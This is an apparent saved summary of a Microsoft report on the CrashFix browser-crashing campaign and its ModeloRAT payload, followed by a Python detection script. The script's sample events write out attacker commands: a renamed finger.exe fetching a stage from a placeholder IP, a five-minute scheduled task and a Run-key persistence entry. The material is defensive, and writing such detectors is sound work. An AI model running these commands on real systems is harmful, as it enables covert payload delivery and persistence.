Saved February 14, 2026
Do you care about this?
Microsoft identified an updated ClickFix campaign that disrupts users' browsers and tricks them into executing harmful commands. This variant uses social engineering and exploits native Windows utilities to deliver a Python RAT payload while evading traditional detection methods.
If you do, here's more
In January 2026, Microsoft Defender Experts observed an advanced variant of the ClickFix campaign, now labeled CrashFix. This tactic deliberately crashes victims' browsers and tricks them into running harmful commands under the guise of fixing the problem. The new approach combines browser disruption with social engineering, significantly increasing the chances of successful execution while minimizing the use of conventional exploit techniques. Because the threat actors rely on trusted user actions rather than software vulnerabilities, behavior-based detection and user awareness are essential for defense.
The attack typically starts with victims searching for an ad blocker and encountering a malicious ad that directs them to a fake Chrome Web Store page. Users are misled into installing a harmful extension that mimics the legitimate uBlock Origin Lite. Once installed, the extension creates browser disruptions through an infinite loop, leading victims to a fraudulent CrashFix warning. A key component of this variant is the misuse of the Windows utility finger.exe, which is renamed to ct.exe to avoid detection. This renamed executable connects to an attacker-controlled IP address, from which it retrieves additional malicious payloads.
The core of the operation revolves around a Remote Access Trojan (RAT) called ModeloRAT, which uses a bundled Python environment to execute malicious scripts. The RAT communicates with command-and-control servers, ensuring persistence by modifying registry entries for automatic execution at user login. It performs extensive reconnaissance on the compromised system, gathering detailed domain and network information. The attackers deploy additional payloads, including a Python script that creates a scheduled task to maintain access every five minutes.
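The three behaviours described above (a renamed copy of finger.exe, a Run-key entry for automatic execution at login, and a scheduled task that fires every five minutes) are each visible in ordinary process-creation telemetry. The following is an added example, not code from Microsoft or from the report, that runs simple detection rules over constructed Sysmon-style events; the file paths, the task name, the 203.0.113.10 address and the ten-minute interval threshold are all assumptions chosen for illustration, not indicators from the campaign.

```python
import re

# Constructed sample events in a Sysmon-style process-creation shape.
# Illustrative only: the paths, task name and 203.0.113.10 are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\finger.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "finger.exe user@host.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # finger.exe copied and renamed to ct.exe; the PE metadata still says finger.exe
    {"Image": r"C:\Users\alice\AppData\Local\Temp\ct.exe", "OriginalFileName": "finger.exe",
     "CommandLine": "ct.exe stage@203.0.113.10",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # scheduled task re-running a bundled Python interpreter every five minutes
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "C:\Users\alice\py\python.exe run.py"',
     "ParentImage": r"C:\Users\alice\py\python.exe"},
    # Run-key persistence written with reg.exe
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svc /t REG_SZ /d "C:\Users\alice\py\pythonw.exe main.py"',
     "ParentImage": r"C:\Users\alice\py\python.exe"},
    # benign schtasks query that must not fire
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": "schtasks.exe /query /tn Backup",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Binaries whose on-disk name should match their PE OriginalFileName.
# finger.exe is the one the report names; the rest are assumptions added for breadth.
WATCHED_LOLBINS = {"finger.exe", "certutil.exe", "mshta.exe", "bitsadmin.exe"}

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\b", re.IGNORECASE)
SCHTASKS_CREATE_RE = re.compile(r"/create\b", re.IGNORECASE)
SCHTASKS_MINUTE_RE = re.compile(r"/sc\s+minute\b.*?/mo\s+(\d+)", re.IGNORECASE | re.DOTALL)
SHORT_INTERVAL_MINUTES = 10  # assumption: intervals at or below this are worth a look


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_renamed_lolbin(ev):
    """Flag a watched system binary whose on-disk name differs from its PE OriginalFileName."""
    image = basename(ev["Image"])
    original = ev.get("OriginalFileName", "").lower()
    if original in WATCHED_LOLBINS and image != original:
        return f"renamed LOLBin: {image} carries OriginalFileName {original}"
    return None


def check_short_interval_task(ev):
    """Flag schtasks /create with a minute schedule at or below the threshold."""
    if basename(ev["Image"]) != "schtasks.exe":
        return None
    cmd = ev["CommandLine"]
    if not SCHTASKS_CREATE_RE.search(cmd):
        return None
    m = SCHTASKS_MINUTE_RE.search(cmd)
    if m and int(m.group(1)) <= SHORT_INTERVAL_MINUTES:
        return f"scheduled task created with a {m.group(1)}-minute interval"
    return None


def check_run_key_persistence(ev):
    """Flag reg.exe writes to a Run/RunOnce key."""
    if basename(ev["Image"]) != "reg.exe":
        return None
    cmd = ev["CommandLine"]
    if re.search(r"\badd\b", cmd, re.IGNORECASE) and RUN_KEY_RE.search(cmd):
        return "Run key modified via reg.exe"
    return None


CHECKS = [check_renamed_lolbin, check_short_interval_task, check_run_key_persistence]


def scan(events):
    """Return (event index, rule name, message) for every rule that fires."""
    findings = []
    for idx, ev in enumerate(events):
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append((idx, check.__name__, hit))
    return findings


if __name__ == "__main__":
    for idx, rule, msg in scan(SAMPLE_EVENTS):
        print(f"event {idx}: [{rule}] {msg}")
```

The OriginalFileName comparison is the useful part: renaming the executable changes the file name but not the version resource inside the PE, which is why the report's ct.exe would still be attributable to finger.exe in telemetry that records that field. Each rule on its own is noisy in a large estate; in practice they are correlated with the parent process (here, a user-writable Python interpreter) before an alert is raised.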
To mitigate these threats, organizations are advised to enable cloud-delivered protection in their antivirus software and to run endpoint detection and response in block mode. Network filtering that restricts outbound access, together with encouraging the use of secure browsers such as Microsoft Edge, can further reduce exposure.